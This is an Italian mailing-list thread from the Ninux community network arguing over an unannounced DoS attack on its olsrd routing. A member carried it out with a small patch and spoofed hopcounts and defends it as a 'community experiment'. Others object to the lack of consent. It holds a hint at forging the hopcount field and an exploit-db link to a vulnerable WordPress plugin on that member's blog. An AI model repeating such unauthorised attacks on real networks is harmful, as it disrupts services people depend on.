 hop da noi è l'attaccante, e provare a identificarlo.

 Parte community:
 fino alla risoluzione del problema non è girata nemmeno una email su
 lista wireless o nodi-roma. C'è quindi un gruppetto che lavora per
 fatti suoi. Un gruppetto chiuso. Questo è una male per la community.
 Non vengono coinvolte tutte le persone nelle cose tecniche ma solo gli
 amichetti.

 solo alla soluzione del problema è stato a questo punto scritto su
 nodi-roma, ma perché? tanto valeva scrivere a me ? E' stato scritto
 perché si doveva additare il cattivo. A quel punto tanta gente
 simpatizzante di Andrea e con poche competenza tecnica ha rincarato la
 dose attaccando il cattivo. Si è arrivati a richiedere una punizione
 con per il cattivo. Ci vorrebbe qualcuno con piu competenze di me in
 psicologia per analizzare in fenomeno.

 La parte tecnica è andata totamente in secondo piano. Non sono stati
 dati dettagli di come è stato trovato l'attaccante. Non sono state
 date risposte alle domande tecniche fatte. Io avevo lanciato degli
 inviti interessati come l'articolo sul blog ma non mi è stato dato
 alcun seguito.

 era proprio questo tipo di esperimento che volevo fare !
 questa community ha bisogno di una cura :)

 ciao,

 Saverio
 ___
 Wireless mailing list
 Wireless@ml.ninux.org
 http://ml.ninux.org/mailman/listinfo/wireless

___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-25 Per discussione lilo
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Il 25/05/2014 10:13, Netsoul ha scritto:
 Una volta queste cose venivano organizzate. Certo, il gestore non
 doveva conoscere la metodologia, ma almeno l'arco temporale in cui
 si sarebbero svolti i pentest. Almeno a me così hanno insegnato.
 Farlo al buio  e poi vantarsi di averlo deliberatamente fatto
 vuol dire aver  mettesso in difficoltà persone che magari proprio
 in quell'arco temporale avevano bisogno della rete o più
 semplicemente stavano cercando di risolvere piccoli bug (che poi
 non capisci se è stato il tuo bug a fottere la rete o la rete che
 fotte te) Boh, forse sbaglio io eh! Ma ai miei tempi  se volevi
 fare una cosa fatta bene e professionale avvisavi e poi postavi
 l'eventuale dump a beneficio di tutti... Netsoul

ma quali tempi? stavo per dirti di andare al Sans giovedi prox.

gruppetto pentester.

Saverio e' una persona brillante e molto curiosa.
come tutti immagino qui dentro, ognuno per lo skill che gli compete.
(a qualcuno piace il FORUM, a qualcuno piace freddo :P)

quindi inviterei a NON scatenare odio per eventuali disservizi.

KEEP KALM ... mica ce lo vedo Saverio a fare il Kattivone c/ninux, eh
daje.

e' vero, poteva avvisare, ma e' anche vero che sta invitando a
_studiare_ _insieme_  questa parte di informatica che ninux dovrebbe,
imho,  tenere in considerazione.

temo di aver scatenato io questa curiosita' tempo fa, mandando una
segnalazione per la quale LUI e' intervenuto al volo. per TUTTI VOI.

ha bonificato DNS incasinati altrimenti molto VULNERABILI.

quindi, per l'intelligenza e la curiosita' (e l'alta coesione) che
rappresenta questa community, direi che APPARTE ER FORUM, se nascesse
un momento per *approfondire*, partendo da quello che l'ottimo N3tS0ul
ha segnalato: L'ETICA DEL PENTESTING

mica sarebbe una cosa malvagia, tutt'altro.

o preferite che un giorno arrivi un Xtestadicazzo dall'esterno a
buttare giu' la rete?

andiamo al Sans giovedi prossimo N3tS0ul? lo dici pure a B4dTrip?
aho', siamo tra AMICI, FRATELLI   SORELLE. remember.



baci.



- -- 
lilo
http://wiki.debian.org/LILO

- -Da grande faro' il cattivo esempio, questo e' uno stage formativo-
bit in rebels
GnuPG/PGP Key-Id: 0x10318C92
FINGERPRINT: 47BE F025 DD21 949F 681E 1D2B 1C2C DA80 1031 8C92
server: pgp.mit.edu


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.14 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQIcBAEBAgAGBQJTge9QAAoJEBws2oAQMYyS+wsP+QGQGEcRpTH4oMkaOAYC5qz9
G5To3L4xUGjxnK/eTwniRBfmfZUQURcgLVE0b6n0DZBxBgZvJCmXtT04+beIaBsS
CBc+CAcWCM9ZZdFgyeyjPeWcuqbkrXuBmK5ITAb0EGPvLigXtHSbRNspSKlq2BNQ
ZkhPdhDasqP83iutoZgmnC4NOjH+9TXi6Ga3wApIBZa7fmLRfmEYDB1jKtzw0m4f
38NZ/cWDWdK1eOUBTiGZF1bsKXi+75KQP2ohLjudVcXkKG7I2jdllKUZQmqCZpjX
XgXyITTs0y+beOLkDUnshdCirI7A4aYaSZV6y5VC53CtDCm/UdyLed8F7PDxKNwK
/ekqYZAQ6DD7AT4zZQz4gSbJKReQ62sxUw0oKEkvNhT7RezfitijxnGQcjwrF/aN
XEPqqcDKsoArnzO7P6alGndq+qN5TjEuP0GjCiiVICmdv/n9juexvtV+R636eI4E
fXC13OGAyzWivR0bymh8tLzCPHmzDj0aaF20M5GXnCNNFaoGYVzC1Yg7CIqpN3d1
nQvhp6EiMMdUwA6VeNKT+HZ3VoEs1oz9CR/Shr6lRgikFpqNLgPF7RvD7R97B4N8
a907egiOrPQaj5BnBDI+4C2uEHW1sYlU4bsrFeLanCjWYNCQYO/XPXaRy35bmYxx
lWVzqOHl4Kb3rGqJL7E/
=RIkn
-END PGP SIGNATURE-
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-25 Per discussione Edoardo Mazzaracchio
Non capisco o magari mi stai prendendo in giro, stai dicendo che il metodo
usato per arrivare al fine è stato il migliore? Che una cosa che si poteva
benissimo fare in altra maniera è stata fatta meglio così?

Aiutami a capire. Io giovedì sarò al FusoLab.
Il 25/mag/2014 15:34 lilo al3l...@autistici.org ha scritto:

 Il 25/05/2014 14:10, Edoardo Mazzaracchio ha scritto:
  Ok, quindi a rigor di logica se voglio verificare la fragilità delle ossa
  di qualcuno gliele rompo e poi gli dico hey, visto? Sei vulnerabile!

 perdonami, il thread e' PENTESTING, non il SanCamillo.

 che pure ci vorrebbe, magari in ninux-salute ...

 di logica, in quello che scrivi, ci vedo 0.

 non voglio nemmeno immaginare un VERO attacco cosa avrebbe provocato.. TE?

 ;)


 --
 lilo
 http://wiki.debian.org/LILO
 
 -Da grande faro' il cattivo esempio, questo e' uno stage formativo-
 bit in rebels
 GnuPG/PGP Key-Id: 0x10318C92
 FINGERPRINT: 47BE F025 DD21 949F 681E 1D2B 1C2C DA80 1031 8C92
 server: pgp.mit.edu



 ___
 Wireless mailing list
 Wireless@ml.ninux.org
 http://ml.ninux.org/mailman/listinfo/wireless


___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-25 Per discussione Saverio Proto
Ciao Alessandro,

allora mi spieghi benissimo come hai fatto ? :)

vedendo i messaggi con un TTL ad un certo numero come hai fatto con
certezza a capire che i messaggi spoofati arrivavano da Gallia ?
Questo ancora non è chiaro dalla tua spiegazione. Sicuramente c'è un
conto (magari grossolano) che hai fatto e ci vuoi spiegare.
Ho anche pensato che forse avevate un email di massima ed avete
mandato un email che era un mezzo bluff per vedere se uscivo allo
scoperto. Dacci maggiori dettagli.

Inoltre mi dici se il tuo metodo funzionava anche un caso di TTL
spoofato ? Se lanciavo i messaggi con hopcount gia settato a 10,
avresti saputo dire con certezza che l'attacco passava da Gallia ?
Ripeto, che succede se faccio m-v4.hopcnt = XXX ?

Soluzioni:
1) Se riesci col tuo metodo a capire da dove partono i pacchetti
spoofati bisogna isolare fisicamente il nodo attaccante.
2) Bisogna in generale creare domini IGP piu piccoli. Non dico di
arrivare come fanno i greci dove ogni nodo è un AS separato, ma
potremmo fare delle frontiere dove si parla BGP in modo da limitare il
dominio nel quale un attaccante può operare.

Per la non fiducia non ti preoccupare, è reciproca ! Sono mesi che
cambiato la politica di accesso ai miei apparati di Ninux :)
Sinceramente trovo controproducente condividere l'accesso ai miei
apparati con un gruppetto chiuso che non scrive nemmeno una email su
nodi-roma mentre analizza un problema per 3 giorni... e poi scrive
solo a cose finite ho risolto.

Saverio


Il 25 maggio 2014 14:45, Alessandro Gnagni alessan...@gnagni.it ha scritto:
 Va be save, hai sempre ragione tu.
 All'inizio sembrava un problema di configurazioni da parte di pierluigi
 sulle sue macchine.
 Dopo aver appurato che era tutto ok ieri sera alle 9 mi sono messo a cercare
 di analizzare la cosa a fondo.
 Io posso spiegare benissimo come ho fatto, solo onestamente non mi fido più
 di te.
 Io avrei preferito che tu agissi con maggior chiarezza, cosa che tu chiedi
 sempre agli altri.
 Tanto ormai solo quello che fai tu è giusto... noi sbagliamo sempre.
 Ma non riesci a fare le cose comunicando con gli altri? Siamo una community,
 tu invece ti sei rintanato nel tuo antro a scrivere codice per creare bug.
 Lo sappiamo tutti che volendo olsr è attaccabbile in milioni di modi, ma per
 questo tuo bug hai creato un problema, senza proporrere una soluzione.

 Il 25/mag/2014 13:50 Saverio Proto ziopr...@gmail.com ha scritto:

 Il 25 maggio 2014 10:13, Netsoul hackerrede...@outlook.com ha scritto:
 
  Una volta queste cose venivano organizzate. Certo, il gestore non doveva
  conoscere la metodologia, ma almeno l'arco  temporale in cui si sarebbero
  svolti i pentest. Almeno a me così hanno insegnato. Farlo al buio  e poi
  vantarsi di
   averlo deliberatamente fatto vuol dire aver  mettesso in difficoltà
 persone che magari proprio in quell'arco temporale
  avevano bisogno della rete o più semplicemente stavano cercando di
  risolvere piccoli bug (che poi non capisci se è stato il tuo bug a fottere
  la rete o la rete che fotte te)
  Boh, forse sbaglio io eh! Ma ai miei tempi  se volevi fare una cosa
  fatta bene e professionale avvisavi e poi postavi l'eventuale dump a
  beneficio di tutti...

 Ciao Netsoul,

 il tuo nick mi è nuovo, quindi prima di tutto piacere di conoscerti.

 le tue osservazioni sono corrette, ma io non volevo solo fare un
 esperimento tecnico, ma un esperimento community.

 Ero ti spiego perché farlo al buio.


 Parte tecnica:
 abbiamo capito che con una patch da 4 righe si può fare un attacco DoS
 che funziona.
 abbiamo capito che se il TTL non è forgiato possiamo capire a quanti
 hop da noi è l'attaccante, e provare a identificarlo.

 Parte community:
 fino alla risoluzione del problema non è girata nemmeno una email su
 lista wireless o nodi-roma. C'è quindi un gruppetto che lavora per
 fatti suoi. Un gruppetto chiuso. Questo è una male per la community.
 Non vengono coinvolte tutte le persone nelle cose tecniche ma solo gli
 amichetti.

 solo alla soluzione del problema è stato a questo punto scritto su
 nodi-roma, ma perché? tanto valeva scrivere a me ? E' stato scritto
 perché si doveva additare il cattivo. A quel punto tanta gente
 simpatizzante di Andrea e con poche competenza tecnica ha rincarato la
 dose attaccando il cattivo. Si è arrivati a richiedere una punizione
 con per il cattivo. Ci vorrebbe qualcuno con piu competenze di me in
 psicologia per analizzare in fenomeno.

 La parte tecnica è andata totamente in secondo piano. Non sono stati
 dati dettagli di come è stato trovato l'attaccante. Non sono state
 date risposte alle domande tecniche fatte. Io avevo lanciato degli
 inviti interessati come l'articolo sul blog ma non mi è stato dato
 alcun seguito.

 era proprio questo tipo di esperimento che volevo fare !
 questa community ha bisogno di una cura :)

 ciao,

 Saverio
 ___
 Wireless mailing list
 Wireless@ml.ninux.org
 

Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-25 Per discussione lilo
Il 25/05/2014 21:04, Net Soul ha scritto:
 non vorrei dire una cazzata, ma sulle possibili TTL-poisoning si era scritto 
 da qualche parte , ed in effetti esisteva un calcolo piuttosto rudimentale 
 per capire se gli hopcount erano originali o meno.Mo' mi documento che mi 
 avete fatto prudere le maniNetSoul

e cmq il blog di Saverio e' un colabrodo

ahahahha.. ops

esempio di etica: il punto di accesso è qui:

chikuncount - v1.3 plugin vulnerabile

approfondi-mentos e affermita' [cit.]:

http://www.exploit-db.com/exploits/24492/

un kattivone avrebbe potuto upparti una backdoor

l'admin di default nel wordpress...

/me HIDE :D

e con questa confido nel fatto che relax e condivisione winwin.



 Date: Sun, 25 May 2014 20:27:54 +0200
 From: ziopr...@gmail.com
 To: wireless@ml.ninux.org
 CC: nodi-r...@ml.ninux.org
 Subject: Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: 
 Malfunzionamento a Gallia

 Ciao Alessandro,

 
 Inoltre mi dici se il tuo metodo funzionava anche un caso di TTL
 spoofato ? Se lanciavo i messaggi con hopcount gia settato a 10,
 avresti saputo dire con certezza che l'attacco passava da Gallia ?
 Ripeto, che succede se faccio m-v4.hopcnt = XXX ?



-- 
lilo
http://wiki.debian.org/LILO

-Da grande faro' il cattivo esempio, questo e' uno stage formativo-
bit in rebels
GnuPG/PGP Key-Id: 0x10318C92
FINGERPRINT: 47BE F025 DD21 949F 681E 1D2B 1C2C DA80 1031 8C92
server: pgp.mit.edu


___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-25 Per discussione Alberto Pizzini
Dopo aver letto anche oggi una sequela di mail infinita su questo argomento
posso dire di essere stanco.
Posso solo pensare che sia pazzo chi pensa che questa sia la strada giusta
per portare Ninux ad essere un progetto rispettato, conosciuto e presente
su tutto il territorio nazionale.
Non deluderò nessuno perché penso che tutte e due la parti abbiano ragione
e torto allo stesso tempo

Saverio, mi spieghi chi ti ha dato il diritto di trattare tutta la rete, e
quindi le persone che ne fanno parte, alla stregua di cavie per questo tuo
presunto esperimento sociologico/psicologico? Ninux per te è forse uno Zoo?
Netsoul, Halino e Edoardo hanno perfettamente ragione, il primo a non
essere stato collaborativo e a decidere egoisticamente per tutti sei stato
te e chi ti ha appoggiato in questo scherzo ovvero un gruppo chiuso di
persone che non ha detto niente a nessuno, esattamente quello che volevi
combattere. Come già successo non sono  state valutate veramente bene le
conseguenze di determinate azioni e queste ultime hanno direttamente o
indirettamente colpito molti. Già in passato hai preso decisioni che hanno
avuto ripercussioni sul prossimo senza chiedere niente a nessuno o
avvertire gli interessati, (cambio OS sulle antenne del Sans senza
avvertire i nodi collegati) il casino e la riunione che ne derivarono non
sembra abbiano toccato minimamente il tuo atteggiamento.


Sarebbe stato molto più divertente fare un test tutti insieme, un giovedì o
un fine settimana, in modo tale da testare la rete in modo CONSENZIENTE e
COMUNITARIO, magari permettendo a qualcuno di imparare qualcosa lavorando
in affiancamento con altri. Si potevano evitare rabbia e astio. Se hai
problemi con certe dinamiche che si son create in Ninux, dovresti
utilizzare il dialogo piuttosto che la prevaricazione per portarli alla
luce. Pensi che quello che è successo cambierà le cose? Secondo me sei
riuscito solo a rafforzare certi atteggiamenti piuttosto che a combatterli,
il tuo scopo poteva anche essere valido, ma i tuoi metodi hanno creato solo
un gran casino.



D'altro canto Andrea te richiedi di prendere questi provvedimenti che mi
sembra quantomeno assurdo. Capisco il tuo punto di vista, capisco che te ed
altre persone avete perso un sacco di tempo per risolvere i problemi
derivati dall'attacco, ma non puoi fare una richiesta simile ad una
comunità come la nostra. Chi dovrebbe essere il giudice? chi l'esecutore?
Non esistiamo neanche ufficialmente, siamo un insieme di singole persone
che hanno in mente un progetto, se a qualcuno non sta bene quello che ha
fatto Saverio prenda i provvedimenti  che desidera, ma non è possibile
richiedere che sia adottata una linea comune o iniziare una guerra che crei
ulteriori danni collaterali. Piuttosto alla prossima decisionale si discuta
di aggiungere nelle line guida che iniziative simili non sono considerate
community correct o come si voglia dire. Non penso che l'attacco sia
stato diretto specificamente contro di te, piuttosto contro la farm che
tieni su per la comunità; come dice Arkanet è il bersaglio più logico per
qualunque attacco. Capisco che tu ed altri siate incazzati, ma non dovete
mai perdere di vista che la cosa più importante è portare avanti Ninux, e
di conseguenza sforzarsi di mantenere la calma e non fare in lista pubblica
richieste o affermazioni pericolose, soprattutto in un periodo di
espansione e crescita come questo.

Sinceramente spero che gli interessati da questa situazione si incontrino
per parlarne a quattrocchi piuttosto che continuare a dire ci vediamo al
fusolab ci vediamo al sans e a discutere via mail, modo impersonale e
che spesso non aiuta a risolvere i problemi. Ci sarà qualcuno abbastanza
lungimirante dal tendere la mano per primo e mettersi in discussione?

Detto questo mi auguro vivamente per il bene di tutti che questa sia la
prima e l'ultima volta che avvenga qualcosa di così increscioso.
Collaborazione avanti a tutto, o finiremo per comportarci come le
generazioni che hanno distrutto il nostro paese.





 -
Alberto Pizzini aka Pandino
Nodo PandinoNet
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-25 Per discussione Net Soul

;P

 Date: Sun, 25 May 2014 22:17:41 +0200
 From: al3l...@autistici.org
 To: wireless@ml.ninux.org
 Subject: Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: 
 Malfunzionamento a Gallia

 
 e cmq il blog di Saverio e' un colabrodo
 
 ahahahha.. ops
 
 esempio di etica: il punto di accesso è qui:
 
 chikuncount - v1.3 plugin vulnerabile
 
 approfondi-mentos e affermita' [cit.]:
 
 http://www.exploit-db.com/exploits/24492/
 
 un kattivone avrebbe potuto upparti una backdoor
 

  ___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless


Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: Malfunzionamento a Gallia

2014-05-25 Per discussione Saverio Proto
Mitici :)
Files php rimasti li a marcire perché il plugin era disabilitato :) ma
cmq una minaccia. Ho fixato,anche perché era vulnerabile anche il sito
di Ciemmona.

Ho fixato ;)

Dai logs ho beccato la vostra scansione. Usate un tool immagino. Ho
visto che prova un sacco di plugins noti. Quale tool usate?

bella !

Saverio



Il 25 maggio 2014 22:17, lilo al3l...@autistici.org ha scritto:
 Il 25/05/2014 21:04, Net Soul ha scritto:
 non vorrei dire una cazzata, ma sulle possibili TTL-poisoning si era scritto 
 da qualche parte , ed in effetti esisteva un calcolo piuttosto rudimentale 
 per capire se gli hopcount erano originali o meno.Mo' mi documento che mi 
 avete fatto prudere le maniNetSoul

 e cmq il blog di Saverio e' un colabrodo

 ahahahha.. ops

 esempio di etica: il punto di accesso è qui:

 chikuncount - v1.3 plugin vulnerabile

 approfondi-mentos e affermita' [cit.]:

 http://www.exploit-db.com/exploits/24492/

 un kattivone avrebbe potuto upparti una backdoor

 l'admin di default nel wordpress...

 /me HIDE :D

 e con questa confido nel fatto che relax e condivisione winwin.



 Date: Sun, 25 May 2014 20:27:54 +0200
 From: ziopr...@gmail.com
 To: wireless@ml.ninux.org
 CC: nodi-r...@ml.ninux.org
 Subject: Re: [Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: 
 Malfunzionamento a Gallia

 Ciao Alessandro,


 Inoltre mi dici se il tuo metodo funzionava anche un caso di TTL
 spoofato ? Se lanciavo i messaggi con hopcount gia settato a 10,
 avresti saputo dire con certezza che l'attacco passava da Gallia ?
 Ripeto, che succede se faccio m-v4.hopcnt = XXX ?



 --
 lilo
 http://wiki.debian.org/LILO
 
 -Da grande faro' il cattivo esempio, questo e' uno stage formativo-
 bit in rebels
 GnuPG/PGP Key-Id: 0x10318C92
 FINGERPRINT: 47BE F025 DD21 949F 681E 1D2B 1C2C DA80 1031 8C92
 server: pgp.mit.edu


 ___
 Wireless mailing list
 Wireless@ml.ninux.org
 http://ml.ninux.org/mailman/listinfo/wireless
___
Wireless mailing list
Wireless@ml.ninux.org
http://ml.ninux.org/mailman/listinfo/wireless